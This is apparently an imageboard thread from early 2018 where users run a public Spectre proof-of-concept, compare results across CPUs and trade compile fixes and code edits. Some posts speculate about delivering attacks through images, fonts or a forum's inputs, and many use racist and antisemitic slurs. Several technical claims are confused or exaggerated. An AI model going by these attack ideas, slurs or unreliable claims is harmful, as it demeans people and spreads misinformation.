Phenom 9600 here: did you use compiler optimizations? I found that it succeeded with no optimizations and failed with optimizations.
The Linux kernel patch was for meltdown, which was only an Intel problem. The code being run in this thread is for spectre, and it appears to be an everyone problem (all processors that do speculative execution).
▶ No.847365>>847381
I forget how savage Linus can be when he wants
▶ No.847366
>>847361
That line was deleted
▶ No.847367>>847373
>>847363
>it is affected you
You should have put
>it has affected you
You stupid nigger get your grammer correct before you correct other people.
▶ No.847368
>>847364
>>847173 here (A6-5400K), it failed with 0xFFs on both standard compile and -O2.
▶ No.847369>>847378
>>847364
that's funny because all the results of the code being run in this thread show intel is fucked and amd is okay. none of the amd posts show the secret words. all of the intel posts show secret words.
also aren't they taking a while pushing this kernel update down the chain?
*buntu LTS is still unpatched. this has been out 8 hours now.
▶ No.847370>>847953
>>847364
And this is why on die instruction scheduling is cancer incarnate. Fucking anticipate commands at compile time or get rekt.
▶ No.847372>>847376
>>847364
> The code being run in this thread is for spectre, and it appears to be an everyone problem (all processors that do speculative execution).
If your getting back nothing but "0xFF=’?’" then this does not effect/affect you.
▶ No.847373
>>847367
"it is affected you retarded poonigger" is correct english, i could have used a comma "it is affected, you retarded poonigger"
"it has affected, you retarded poonigger" is incorrect you fucking pajeet.
"it has because you poo on the street that you are a poonigger" is not valid english
"it is because you poo on the street that you are a poonigger" is valid english
▶ No.847374>>847377 >>847379 >>847380 >>847382 >>847556
>>847282
can someone give me a quick rundown on what the stats mean ("score", "second best", etc.)?
▶ No.847375
>>847364
Phenom II guy here: can't read a single character from the secret message with -O0 to -O3 and also -Os, -Ofast and -Og
▶ No.847376
▶ No.847377
>>847374
It was able to read back the magic word completely.
Your Fucked.
▶ No.847379>>847384 >>847387 >>847389
>>847374
>/* Report best guess in value[0] and runner-up in value[1] */
>/* Clear success if best is > 2*runner-up + 5 or 2/0) */
If at the beggining of the line you get a malicious_x you are vulnerable. If you get what >>847371 got then you are safe. I think a better question is how the hell the x200 is safe from this cancer?
▶ No.847380
>>847374
It's predicting what the magic word is - second best means just that, it's the second closest value it could get.
▶ No.847381>>847402
▶ No.847382>>847385
>>847374
If score isn't 0, remove your motherboard and CPU, put it in a bin, and light it on fire.
▶ No.847383>>847386
>>847378
>windows
>$ prompt
▶ No.847384
>>847379
But anon, if you get 0xFF's instead of anything secret, the exploit doesn't seem to be working properly.
Also the same happens on a Thinkpad R60 but not on X201.
▶ No.847385>>847388
>>847382
and replace it with what? your not even going to be able to get a powerpc cpu in a few days. i doubt they have that many in stock or produce them fast enough to meet the demand this is going to cause.
▶ No.847386
>>847383
It's Cygwin, you nigger.
▶ No.847387>>847392 >>847431
>>847379
I don't fucking know man. I got hardened gentoo. It might be the savior of western civilization.
▶ No.847388>>847390 >>847393
>>847385
There's plenty of old powerbook mac's for people to use with webbrowsing. The real question is what the servers are going to do, that will allow them to keep up the modern cancer that is the internet. If we went back to websites like 8ch alone then it would be ok. But the pajeetscript filled sites like goybook are going to get fucked.
▶ No.847389
>>847379
By the same, I mean SIGILL
▶ No.847390
>>847388
none of them rely on single server performance, they're all loadbalanced across a shit ton of servers. if they take a 30% performance hit it means they're going to need 30% more servers and have to pay 30% more to run their cancer.
▶ No.847392>>847397
>>847387
>tfw all servers are going to be running on x200's running hardened gentoo in the future with the clients as ancient powerpc macbooks.
Then what would the routers be though......
▶ No.847393>>847396
>>847388
The electrical grid is going to melt down from everyone dusting off and firing up old G5 Quad's.
▶ No.847395>>847398 >>847400
>>847378
seems like amd is actually vulnerable, so the question remains are linux users safe or could you rewrite the exploit for it?
▶ No.847396
>>847393
Not if they use the old g4 laptop powerbook format ones that run hardened gentoo. That would severely decrease electricity usage. Combine that with things like the eZ80 and consoles running powerpc to supplement phones and you are golden for clients since ARM is not a option. But the servers are going to get rekt.
▶ No.847397>>847399 >>847400
>>847392
I aint a /pol/nigger Zionist though so fuck off.
▶ No.847398
>>847395
well clearly they haven't dropped the kernel update yet. all linux machines are vulnerable at the moment.
▶ No.847400
>>847397
What does that have to do with anything? I don't care if you are the most badass trump /pol/ack or the biggest giga-kike. When it comes to technology it is either possible or it is not and both deserve security and privacy. well MAYBE not the giga-kikes, but then the /pol/acks couldn't have it either as it wouldn't be secure.
>>847395
You could probablly rewrite it to work on mac osx too.
▶ No.847403>>847404
THE PATCH EXEMPTING AMD FROM KPTI WILL BE IN 4.15
AMD BTFOing everyone.
▶ No.847404>>847405
>>847403
Lots of @INTEL.COM faggots have access to the kernel tree. They where trying to put that "all cpu's" shit in as damage control.
▶ No.847405>>847407 >>847409
>>847404
What about all the intel users below Pentium pro?
▶ No.847407>>847491
>>847405
Anything with an x86 cpu and an MMU is affected. Don't listen to the cianigger A.I trying to D&C.
▶ No.847409>>847417
>>847405
fuck them too apparently according to intel. buy a new i9 like a good goy
▶ No.847411
>tfw you bought an (((Intel))) processor before you knew about (((who))) owns it.
▶ No.847412
>>847410
That's only a temporary fix like the linux patch. You can still exploit it if git gud.
▶ No.847414>>847416
>>847410
>nda
That is more concerning then anything else here. Why have they known about this and not told anyone else?
▶ No.847416
>>847414
NDA's are not uncommon in the corporate world.So Apple using them is SOP. What would really be concerning is if supposed "Open Source" developers signed them. They would be protecting (((them))) for FREE.
▶ No.847417
>>847409
I meant specter. Sorry for getting it confused.
▶ No.847418>>847422 >>847556 >>848209
R5 1600 here.
PREPARE YOUR ANUS
▶ No.847419>>847423
I wonder what kind of year 2018 is going to be. We are on day 3 and all of /tech/'s fears have been validated beyond anything that could have been hoped for. Death to botnet.
▶ No.847422>>847425
>>847418
now is not the time to buy a new processor.
the cpu market is going to be fucked. everyone is going to be waiting for the next generation of processors that aren't fucked by these problems. on the other hand, maybe the prices will drop for these now trash processors?
▶ No.847423>>847432
>>847419
Until we get confirmation this is being used for bluebeam, /tech/'s worst fears haven't come yet.
▶ No.847425>>847429 >>847440
>>847422
at least I can reuse my new motherboard I guess, unlike intel customers.
I was dragging my feet on installing uMatrix, thinking uBlock was good enough, but now I've added it. Hopefully that'll mitigate/fend off web exploits for long enough for a Spectre patch to come through.
▶ No.847426
ixquick literally overloaded and is in shutdown mode now
▶ No.847429>>847430 >>847440
>>847425
Disable images, disable fonts in umatrix/ublock, disable javascript, and don't play videos on the internet. That's your best bet to fend it off for as long as possible. But you still will get rekt if your browser's CSS or text encoding is shit pajeet tier quality.
▶ No.847430>>847433 >>847440 >>847683
>>847429
>Disable images, disable fonts
How would this execute through images and fonts in any realistic scenario?
▶ No.847431>>847683
>>847387
i tried the same thing on my librebooted x200 running on usb ubuntu and got the same result
▶ No.847432>>847434
>>847423
How does this tie into project bluebeam? They disable the internet and fake God or Ayyliems?
▶ No.847433>>847436
>>847430
>be bad goy
>find bug in image proccessing library libturbo-jpeg or the commonly crossplatform libpng
>abuse bug by making image with virus in it
>use specter to elavate priviledges
>??????
>profit
>be good goy
>find bug in downloader, the image proccessing library for the browser, and or the decoder library for the image
>create font image abusing bug to get elavation with specter
>place font images in spots that download over the internet via CDN's like jewgle
>????
>profit
It's all a fucking botnet.
▶ No.847434
>>847432
Well they would be using the audio device of every computer on the planet for the sound of said project. So that would be how it ties in. No need to disable internet, just use the audio.
▶ No.847435>>847491
>>846907
HE TRIED TO WARN US
<We didn't listen
>>https://marc.info/?l=openbsd-misc&m=118296441702631
>>fucking 2007
>Various developers are busy implimenting workarounds for serious bugs
in Intel's Core 2 cpu.
>These processors are buggy as hell, and some of these bugs don't just
cause development/debugging problems, but will *ASSUREDLY* be
exploitable from userland code.
▶ No.847436>>847437 >>847438 >>847441 >>847463 >>847683
>>847433
fuck, how am I going to watch porn now????
▶ No.847437
>>847436
eZ80 proccessor built by hand and ASCII art. Or print it out.
▶ No.847438
>>847436
ASCII porn, nigger.
▶ No.847439>>847444
CPU: Intel Core i5-3230M
I sold my Bitcoins for this. Kill me.
▶ No.847440>>847446
>>847425
>>847429
>>847430
>fonts
CSS can be abused theoretically
>image
Not sure how but I suppose it depends if your browser has advanced hardware acceleration.
I don't block images since I disabled hardware acceleration.
I don't block CSS either because it's still fairly limited.
https-strict: * true
https-strict: behind-the-scene true
matrix-off: about-scheme true
matrix-off: addons.about-scheme true
matrix-off: behind-the-scene true
matrix-off: chrome-extension-scheme true
matrix-off: chrome-scheme true
matrix-off: localhost true
matrix-off: opera-scheme true
referrer-spoof: * true
referrer-spoof: behind-the-scene true
ua-spoof: * true
ua-spoof: behind-the-scene true
* * * block
* * cookie block
* * frame block
* * media block
* * other block
* * script block
* * xhr block
* 1st-party * allow
▶ No.847441>>847445
>>847436
BitTorrent. Burn to CD. Then bring to offline, air gapped machine dedicated to playing multimedia.
▶ No.847444
>>847439
fails with -O2 and higher
▶ No.847445
>>847441
>Thinking airgapping will save people
▶ No.847446>>847457
>>847440
The libraries that execute via software instead of hardware acceleration can be abused too.
▶ No.847447>>847449 >>847450 >>847451 >>847467
OK, SO SOMEONE CAN TARGET THE 8CH SERVER WITH SPECTRE RIGHT???
What the fuck do I do with my board, should I just wipe it???
▶ No.847449>>847452
>>847447
there's no point now, linux kernel patches haven't hit the repo's yet. if your going to nuke and re-install wait until the patches are in the repo's.
▶ No.847450>>847454 >>847456 >>847459
>>847447
I would hope that codekike would have been smart enough to get off of x86 long ago after the first hacking incident.
otherwise you need to make sure that the entire board, archive, and account credentials are deleted. you are using a fake email/name and seven proxies right?
▶ No.847451
>>847447
Target it and implement your own botnet.
▶ No.847452
>>847449
There's no Spectre patch dude, read the thread.
▶ No.847454>>847458
>>847450
>you are using a fake email/name
not even using an email.
>and seven proxies right?
have been recently, but not in the past. Also, aren't my proxies gonna get owned soon?
▶ No.847456
>>847450
Then again he never did switch to openbsd from freebsd.....
▶ No.847457
>>847446
Ha shit.
I guess I'll need a computer just for browsing the web the normal way.
▶ No.847458>>847461 >>847476
>>847454
Yes they are, actually everything is going to either get patched or pwned soon. Literally nothing is stopping someone from taking over the world within an hour now by holding all computer systems hostage. Welcome to 1984.
▶ No.847459
▶ No.847460>>847479
So -O2 and higher seems to mitigate the attack and the "safe and stable" -O1 and lower are getting pwned lmao.
▶ No.847461>>847464
>>847458
>everything is going to either get patched
literally no patch for spectre yet though. holy fuck. this is gonna be insane.
▶ No.847462>>847688
Rustaceans aren't spotted for once I wonder why.
▶ No.847464
>>847461
That part of the happening hasn't even begun.
▶ No.847465>>847469 >>847471
>enable First-Party Isolation in Firefox
>RAM usage QUADRUPLES
>Now using like 9GB of RAM on Firefox
>still might keep it on just for the sake of not getting owned
https://www.ghacks.net/2017/11/22/how-to-enable-first-party-isolation-in-firefox/
▶ No.847467>>847469 >>847470
>>847447
No, they can't, to exploit Spectre you need the program to be running locally. With Meltdown it can be executed remotely
▶ No.847468
WHO /LEAVING THE INTERNET FOR A MONTH/ HERE?
I've got like a hundred anime and movies in my backlog. Hundreds of textbooks... Time to get comfy.
▶ No.847469>>847470
>>847467
>>847465
>what is javascript
▶ No.847470>>847473
>>847467
Oh wait, 8ch runs on its own dedicated hardware doesn't it? I guess it's a bit safer than some shit in the cloud. Cloud servers are FUCKED.
>>847469
Why would the 8ch server be running someone else's JS?
▶ No.847471
>>847465
Why would this be necessary if PTI is already enabled though? Does Firefox even need to access kernel memory that often? it probably does considering its been taken over by Pajeets
▶ No.847473
>>847470
There are several methods of input to 8ch's servers. There is the hash generator taking input of filenames, the comment/name/email/subject inputs, the login and password fields for hotpockets, and the RSS fields listening for inquiry from clients. It's possible if you are dedicated enough to get code execution via RSS or filename inputs. Don't you dare fucking do it though. This is only relevant if codekike is still using x86 however as code execution isn't going to do you a whole lotta good if you can't escape whatever he is using to isolate said functions on the servers.
▶ No.847474>>847475
>>846194
>internet nazis live in my head rent free
Thanks. I needed that laugh.
▶ No.847476>>847484
>>847458
> Make uber-ransomware
> Use a ultimate redpill picture or even one that shifts every few minutes to another one
Sounds like a easy victory.
▶ No.847478
>>847057
>intel is trying to bribe linux
>bribe
>linux
You are a fucking retard
▶ No.847479>>847481
>>847460
No. It's just a PoC so there is probably some essential part of it being optimized out.
▶ No.847481
>>847479
kek so it's UB to boot
▶ No.847484>>847493
>>847476
What could you show everyone that would be universally understood across the globe though? A picture of anti-kike wouldn't do much good as not everyone understands that. This is literally bablon tier bullshit you are talking about. Don't do it.
▶ No.847491>>847494
>>847435
I'm fairly certain, now that I've read about the attack, that KARL doesn't help. OBSD needs its own patch, but your average OBSD server is probably safe because how many of them allow untrusted code to run on them?
>>847407
>Anything with an x86 cpu and an MMU is affected
Every processor that does speculative execution (multiple dispatch, out-of-order execution, branch prediction, etc) could be affected. Intel is in the hot seat because they aren't doing security check on reads that haven't happened yet (and it takes some coercion to determine the data that was read as it is not exposed in the logical state of the machine).
▶ No.847493>>847495
>>847484
goatse with an Intel tramp stamp?
▶ No.847494
>>847491
Well this specific exploit is for x86 based proccessors, don't even get me started on the other piles of shit. It's all shit, but x86 is the heaping pile of shit that will bring the house down.
▶ No.847495>>847968
>>847493
How exactly would that communicate the evilness of kikes? You know you could use audio too?
▶ No.847500
seL4 is also patching the meltdown exploit.
▶ No.847511>>847512
I realize the patch doesn't seem to negatively affect gaming performance, but I run Windows in a VM with hardware passthrough. Will I see the performance hit because of that?
▶ No.847512>>847518
>>847511
Yes, why aren't you running it via wine yet? Almost everything but directx12 games work via it now. You have no excuse.
▶ No.847518
>>847512
Because
>almost
is a lie and you and I know that. It's getting a fucking lot better than it was, but there's still a lot that doesn't run.
▶ No.847522>>847540
Ho-lee-fuck. This is a really bad week to be a computer janitor.
I don't even store passwords in the browser and I've completely disabled javascript until this all blows over. God damn, they really fucked up. Intell fucked up the worst. HN is filled with fucking retards that don't understand the difference between the rogue cache load and the bounds check bypass bugs.
Intel fucked up bad. Never thought I'd see errata like this anymore.
▶ No.847523
>>847341
They admit they're affected but there is a
<near zero risk
of the exploit working for exploit 2. Sounds like some of that fag talk to me.
▶ No.847524>>847526 >>847529 >>847683
▶ No.847526
>>847524
Archive https://archive.fo/8MRFQ
And holy shit, everybody is pwned already then.
▶ No.847529>>847560
>>847524
Oh the article doesn't say that you faggot. It just says they wanted to get away from x86. The (((ME))) has been known about for a while now so that's probably why they wanted to get away from it.
▶ No.847540>>847560
>>847522
This bug has been there for 20 years.
▶ No.847553>>847560
>inb4 lurk moar
So the main way that meltdown attacks the computer is by running a script on the internet browser? I assume that's not the only way. So won't patches to internet browsers mostly fix this with most users in the short-term?
I guess going on from that thinking, would every website you usually visit be exempt from this or would there be ways for someone to infect a site like 8chan so that even though it's presumably safe now, in the future it could be potentially dangerous?
▶ No.847556
>>847282
>>847287
>>847304
>>847313
>>847330
>>847340
>>847374
>>847418
>https://googleprojectzero.blogspot.fi/2018/01/reading-privileged-memory-with-side.html
> A PoC that demonstrates the basic principles behind variant 1 in userspace on the tested Intel Haswell Xeon CPU, the AMD FX CPU, the AMD PRO CPU and an ARM Cortex A57 [2]. This PoC only tests for the ability to read data inside mis-speculated execution within the same process, without crossing any privilege boundaries.
>A PoC for variant 1 that, when running with normal user privileges under a modern Linux kernel with a distro-standard config, can perform arbitrary reads in a 4GiB range [3] in kernel virtual memory on the Intel Haswell Xeon CPU. If the kernel's BPF JIT is enabled (non-default configuration), it also works on the AMD PRO CPU. On the Intel Haswell Xeon CPU, kernel virtual memory can be read at a rate of around 2000 bytes per second after around 4 seconds of startup time. [4]
So AMD only has the vuln in a single process right now?
▶ No.847560>>847590 >>847592 >>847683 >>847755
>>847540
There are three bugs.
>>847529
It has nothing to do with the management engine.
Everyone hates x86. This shitstorm just confirms that the neckbeards are indeed wise.
https://marc.info/?l=openbsd-misc&m=119318909016582&w=2
Linus has some good ones too but I'm too lazy to find a link, Theo's should be good enough.
>>847553
There are three bugs. Meltdown is an intel bug, it comes with some IA-32 remnant shit with specullative execution and caches. The other two Spectre bugs are basicallly branch predictor fuckery. They're applicable to more modern processors and shit like javascript when it comes to normalfag computing and mitigation probably needs to be done in the browser first and foremost.
▶ No.847564>>847587
>Reading 40 bytes:
>Illegal instruction
What does it mean? I'm on a T60 w/ T2400 BTW...
▶ No.847577>>847585
>>846698
>assigns Intel to Muhcpu
What a fucking spastic.
▶ No.847584
>>846698
You've been Koding with Karlie.
▶ No.847585>>847588
>>847577
if muhcpu.dev = `Intel then raise Just_fuck_my_shit_up
OCaml. Not an assignment.
▶ No.847587
>>847564
It means you're not vulnerable to this Meltdown POC.
▶ No.847588>>847591
>>847585
That faggot was clearly trying to write C++, you dumbshit pajeet. Hell, it was probably you.
▶ No.847590>>847624 >>848315
>>847560
>Theo
Brutal. Linus was brutal too.
I wonder how many negative comments are being straight deleted on hacker news. Like not even showing that they are deleted. I bet it is a lot, clueless morons. They all think the CEO of Intel didnu nuffin wrong.
▶ No.847591>>847595
>>847588
The word 'OCaml' refers to the immediately preceding code. Which is written in OCaml. That faggot successfully wrote C++. That it's buggy is pretty normal for C++.
▶ No.847592>>847596
>>847560
>Everyone hates x86
why is that?
t. baka that doesn't program
▶ No.847594
>terry goes missing and then this happens
So this is the tribulation...
▶ No.847595
>>847591
>That it's buggy is pretty normal for C++
Only when you're a pajeet.
▶ No.847596>>847604 >>847624
>>847592
it has a lot of instructions that are attractive nuisances: they're slower than more roundabout ways of doing the same thing.
it's just a mess and not fun at all, compared to ARM.
performance has been stagnant for nearly two decades now -- and the key driver of the illusions of performance gains have just been revealed to be massive security holes.
I'm buying NVDA stock. Future is GPUs.
▶ No.847597>>847624 >>847828 >>848033
That's it. Wii Linux is my daily driver from now on. I'm getting out of here before shit *really* hits the fan.
▶ No.847604>>847605 >>847624
>>847596
>NVDA
That's basically intel by another name. You have to go back.
>>>/g/
▶ No.847605>>847608 >>847624
>>847604
>all evil corporations are the same
GPU speed comes from vectored operations. CPU speed comes from snake oil. The snake oil is about to go bad. Invest in vectored operations.
▶ No.847608>>847610 >>847624 >>848035
>>847605
GPUs do prediction shit too though right?
▶ No.847610
▶ No.847615>>847622 >>848044 >>848063
I think we need an OS with a JIT compiler like TempleOS, except in place of HolyC we should have an IR bytecode like LLVM. The only explicit native instructions are to bootstrap the system, and the others are under control of the JIT's output. That way it's impossible to craft malicious assembly programs, and then it's trivial to port the existing C/C++ software without changing anything.
▶ No.847617
Someone get Zeloof to make us a non-botnet CPU already
▶ No.847622>>847625
>>847615
That's called virtualization / a virtual machine.
▶ No.847624>>848033
>>847608
Yes you gigantic faggot, GPU's have the same cancer as CPU's for branch prediction but with more dedicated and optimized RISC implementations. So it isn't as noticeable but still happens because in the end you are going through an intermediary langauge like CUDA or OPENGL which are shit for security, or rather for anticipating every state of the graphics all the times. This anon >>847605 is correct though.
>>847597
>not already having switched off of x86 for web browsing and only keeping x86 for legacy vidya
>>847596
>what is heat
>>847604
(((Nvidia))), (((jewtel))), and ((((AMD))) are all owned by the same (((people))). Why do you think we are in this mess?
>>847590
The few times being on a politically incorrect website helps, when (((corperations))) go full shut it down mode in unison.
▶ No.847625>>847626
>>847622
Indeed. Without the security risks of running on the native cpu under hypervisor.
▶ No.847626>>847630
>>847625
But for that you are going to need a whole hell of alot of GFLOPs of performance.
▶ No.847630>>847633
>>847626
There are certain startup costs in this method, but I am not so convinced about significant runtime penalty, until I see I see such system put into practice and measured.
▶ No.847633>>847668 >>848048
>>847630
Well yea, someone needs to invent a CPU that doesn't use out of order operation baby hand holding schedulers. Compilers need to be re-wrote that anticipate the order of execution of software. Said compilers should also parellelize properly for the code while maintaining execution order over many cores. Said CPU should be RISC based and not using much microcode or it should be FOSS microcode for the compiler/devs to be able to control it better. No legacy shit like the 8086 ISA and include acceleration for things like webm and SIMD on the die.
AND NO INTEL, AMD, OR NVIDIA. That's for sure.
▶ No.847639>>847645 >>847646
How do I explain to my family that the computers they got for Christmas are all completely fucked? Man, the botnet really puts an emotional burden on you.
▶ No.847645
>>847639
return them if you can.
▶ No.847646>>847650 >>847653
>>847639
I bought a haswell laptop and built a ryzen system within the last 6 months.
I knew I should have stuck with my old phenom.
just fuck my shit up
▶ No.847650
>>847646
You can keep them for vidya, just don't do anything secure or needing security on them like web browsing or banking online. Looks like the whole world just got their shit fucked up.
▶ No.847653>>847656
>>847646
your ryzen system will be ok once the firefox patch comes in that obfuscates memory timing. the haslel is fucked as far as I can tell, IDK what I'll do with my old laptop either. waiting for Ryzen thinkpads I guess.
▶ No.847656>>847906
>>847653
It really sucks, I just put a great panel in it and got a nice wifi card. guess I'll put off the other mods for now.
>Ryzen thinkpads
is there any good AMD laptops? the only times I come across them is because they're dead or close to it.
▶ No.847668>>847670 >>847672
>>847633
Yep. Intel were being too smart for their own good I suspect it may have been intentional though, and we really need dumb and predictable hardware. Also, I do wonder why this cannot be fixed by firmware microcode update.
▶ No.847670>>847676
>>847668
>Also, I do wonder why this cannot be fixed by firmware microcode update.
Doing that for 20+ years of processors across God knows how many motherboards via BIOS update is simply out of the question.
▶ No.847672
>>847668
Because of what is underneath the microcode and on the silicone can not be changed. Cancer is cancer and there is no changing that aspect of the x86 architecture when it comes to the insecurity of the MMU.
▶ No.847676>>847677
>>847670
From what I heard, it was just that they "couldn't", but I'm not sure of the technical reason why. I suppose their look ahead pipelining is done at the silicon level?
▶ No.847677>>847680
>>847676
>what is the MMU
Yes it is done at the silicone level you giant faggot. Why do you think this effects every intel cpu?
▶ No.847680
>>847677
You learned about an MMU yesterday, and now you're the expert. Amazing.
▶ No.847683>>847686 >>847716
>>847431
Libreboot X200T with Debian Stretch, also "illegal instruction" under several -O settings. It doesn't need to be compiled with an i386 toolchain does it? Also a kernel fix hasn't yet landed for meltdown.
>>847524
I suspect there's probably issues with the POWER-based CPUs at this point. Confirmation would be of interest.
>>847560
♥ De Raanter.
>>847436
Move to Akihabara.
>>847430
>fonts
One of the original XBOX hacks did this because the system failed to verify them, and the font handler was exploitable. Mind, the overall system was insecure, but it can happen.
▶ No.847686
>>847683
if you debug it using gdb it shows that the program breaks at line 64
▶ No.847688
>>847462
B-but m-uh safety!!!!
▶ No.847718
>>847716
All windows versions have an exploitable everything. Their not the ones to be worried about as theres twenty thousand different ways to infiltrate them. The real worry is unix systems.
▶ No.847724
https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6#gistcomment-2310736
To those who are getting the "illegal instruction" error, try this. Unfortunately it seems to be a matter of tuning for different systems, not that some of them are safe.
▶ No.847736>>847810
The vulnerabilities discovered in the Intel CPUs will never be exploited, as the Intel Management Engine already provides all the necessary backdoors.
▶ No.847752
So this has been out since last year? If I'm worried about it I will be affected already, right? Or not.
▶ No.847755>>848209 >>848333
>>847560
>This shitstorm just confirms that the neckbeards are indeed wise.
Guess he was proven right.
▶ No.847760
This proves i was right from the beginning 17 years ago, privileges, execution modes are meaningless, antiviruses, firewalls are useless shit trojan backdoors, and there is no such thing as security or privacy on a computer that is plugged in a network accessible from outside.
All that was needed is a microkernel, or even exokernel like in Minix3 that is used in your intelme trojan botnet integrated in your pc and enabled by default.
▶ No.847782>>847784
So the AMD Piledriver CPUs are largely safe from these attacks?
▶ No.847784
▶ No.847810
>>847736
My fucking sides.
▶ No.847819
>>847410
>APPLE fixed this last month in OS X UNIX(tm)
>LINUX BTFO
Well you get what you pay for.
▶ No.847828
>>847597
Yeah, avoid that security bug by using an outdated as fuck kernel that undoubtedly has a plethora of even worse security bugs.
Granted, using a PowerPC based game console isn't a bad idea in theory, but nobody cares enough to maintain development.
▶ No.847862>>847869 >>847909
Okay question from a newfag who is kinda concerned: mum uses a windows XP tower running an intel graphics card: how do I make sure she doesn't get fucked over. Thanks.
▶ No.847869
▶ No.847890
>>846984
*boings in front of you*
▶ No.847895
>>847176
>"nazi"
>bad
where do you think you are you undergassed oven dodger
▶ No.847906>>847918
>>847656
>is there any good AMD laptops?
Only Ryzen has good enough batter performance. FX laptops are shit. Just wait for more Ryzen laptops.
▶ No.847908
>>847267
Newsflash: 486 has a cache and a branch predictor. It's likely just as vulnerable.
▶ No.847909
>>847862
>mum uses a windows XP tower
lol
▶ No.847915>>847916 >>847936
>>847290
>>847297
If it's just rdtscp and clflush then you should be able to replace them with intrinsics for whatever are the equivalents on PowerPC. I would expect every modern-ish ISA to have such basic instructions.
▶ No.847916
>>847915
it is Read Timestamp Counter that gets the number of clock ticks since power on from cpu
▶ No.847918>>847983
>>847906
>FX laptops are shit.
The last two generations (Carrizo and Bristol Ridge) were pretty decent. They didn't beat any performance records, but AMD did a great job on improving energy efficiency, squeezing decently clocked faux quad-cores into thermal envelopes where Intel could only put two cores. Add a decent iGPU into the mix, and you could get a thin and light laptop that would outperform Intel's immediate competition under most multithreaded CPU loads and game pretty well for its size, at a decent price.
It's a fucking shame AMD didn't get more design wins. Those APUs deserved to be used more.
▶ No.847926
>>847316
LOL @ gexcolo.
Cockboxes are about to penetrate each other!
▶ No.847931>>847935
>>847345
386 executes instructions one by one in strict program order, so it's probably immune. And it does have an MMU.
kek
▶ No.847935
>>847931
FPGA is immune too, and Atmel microcontrollers
▶ No.847936>>847952
>>847915
Having trouble getting any of the code on that github link to work.
Anyone got it to run on
Architecture: x86_64
CPU op-mode(s): 32-bit, 64-bit
Byte Order: Little Endian
CPU(s): 2
On-line CPU(s) list: 0,1
Thread(s) per core: 1
Core(s) per socket: 2
Socket(s): 1
Vendor ID: GenuineIntel
CPU family: 6
Model: 23
Model name: Intel(R) Core(TM)2 Duo CPU P8400 @ 2.26GHz
Stepping: 6
CPU MHz: 2266.806
BogoMIPS: 4533.61
Virtualization: VT-x
L1d cache: 32K
L1i cache: 32K
L2 cache: 3072K
Flags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good nopl aperfmperf eagerfpu pni dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm sse4_1 lahf_lm tpr_shadow vnmi flexpriority dtherm
▶ No.847952>>847996
>>847936
try this:
gcc -march=core2 -O0 -o spectre spectre.c && ./spectre
but first, go into the source code and edit these 2 lines:
89c89
< time1 = __rdtscp( & junk); /* READ TIMER */
---
> time1 = __rdtsc(); /* READ TIMER */
91c91
< time2 = __rdtscp( & junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
---
> time2 = __rdtsc() - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
but first g
rdtscp(&junk) => rdtsc()
your trannyboot machine is not safe with spectre
now i want to know if it's safe from meltdown
▶ No.847953
>>847370
>Fucking anticipate commands at compile time
This is literally impossible. You never know which way the control flow will go before actually executing the code.
▶ No.847968
>>847495
I surely don't want to hear audio to that one.
▶ No.847983>>848040
>>847918
>The last two generations (Carrizo and Bristol Ridge) were pretty decent.
Well, put in the right perspective they're usable. For /tech/ posters, half of whom are using old c2d thinkpads, the perf is not a big issue.
▶ No.847985
How is Intel going to patch this? Update MINIX?
https://www.pcworld.com/article/3245508/components-processors/intel-responds-to-the-cpu-kernel-bug.html
>Intel said the patches for the CPU vulnerability, due next week, would bring a negligible performance hit to the average user. Claiming that the patches can make PCs "immune" from the vulnerabilities is a first, though.
▶ No.847986>>848002
When the fuck is my distro going to update Firefox?
Firefox needs the JS timer gimp to stop Spectre. Why is Fedora sitting on its ass?
▶ No.847996>>848005 >>848009
>>847952
still not working
▶ No.848002>>848020
>>847986
>not using palememe or icecat already
pathetic
▶ No.848005
>>847996
post screenshots then
▶ No.848007
A Friend on MacBook pro has severe performance issues after a security fix from last month (especially when using 3d rendering software) could that be related?
▶ No.848009>>848011 >>848012
>>847996
saying there is too few arguments to function. Should I use the original code from the paper or one github link.
errors from original
spectre.c: In function 'readMemoryByte':
spectre.c:67:7: error: too few arguments to function '__rdtscp'
time1=__rdtscp();
^
In file included from /usr/lib/gcc/x86_64-pc-linux-gnu/5.4.0/include/x86intrin.h:27:0,
from spectre.c:8:
/usr/lib/gcc/x86_64-pc-linux-gnu/5.4.0/include/ia32intrin.h:112:1: note: declared here
__rdtscp (unsigned int *__A)
^
spectre.c:72:7: error: too few arguments to function '__rdtscp'
time2=__rdtscp() - time1;
^
In file included from /usr/lib/gcc/x86_64-pc-linux-gnu/5.4.0/include/x86intrin.h:27:0,
from spectre.c:8:
/usr/lib/gcc/x86_64-pc-linux-gnu/5.4.0/include/ia32intrin.h:112:1: note: declared here
__rdtscp (unsigned int *__A)
^
error for code lined in github
spectrelast.c:50:29: error: "80" may not appear in macro parameter list
#define CACHE_HIT_THRESHOLD(80) /* assume cache hit if time <= threshold */
^
spectrelast.c: In function 'readMemoryByte':
spectrelast.c:89:15: error: too few arguments to function '__rdtscp'
time1 = __rdtscp(); /* READ TIMER */
^
In file included from /usr/lib/gcc/x86_64-pc-linux-gnu/5.4.0/include/x86intrin.h:27:0,
from spectrelast.c:8:
/usr/lib/gcc/x86_64-pc-linux-gnu/5.4.0/include/ia32intrin.h:112:1: note: declared here
__rdtscp (unsigned int *__A)
^
spectrelast.c:91:15: error: too few arguments to function '__rdtscp'
time2 = __rdtscp() - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
^
In file included from /usr/lib/gcc/x86_64-pc-linux-gnu/5.4.0/include/x86intrin.h:27:0,
from spectrelast.c:8:
/usr/lib/gcc/x86_64-pc-linux-gnu/5.4.0/include/ia32intrin.h:112:1: note: declared here
__rdtscp (unsigned int *__A)
^
spectrelast.c:92:20: error: 'CACHE_HIT_THRESHOLD' undeclared (first use in this function)
if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
^
spectrelast.c:92:20: note: each undeclared identifier is reported only once for each function it appears in
spectrelast.c: In function 'main':
spectrelast.c:136:51: warning: pointer/integer type mismatch in conditional expression
(value[0] > 31 && value[0] < 127 ? value[0] : "?"), score[0]);
^
spectrelast.c:135:12: warning: format '%c' expects argument of type 'int', but argument 3 has type 'char *' [-Wformat=]
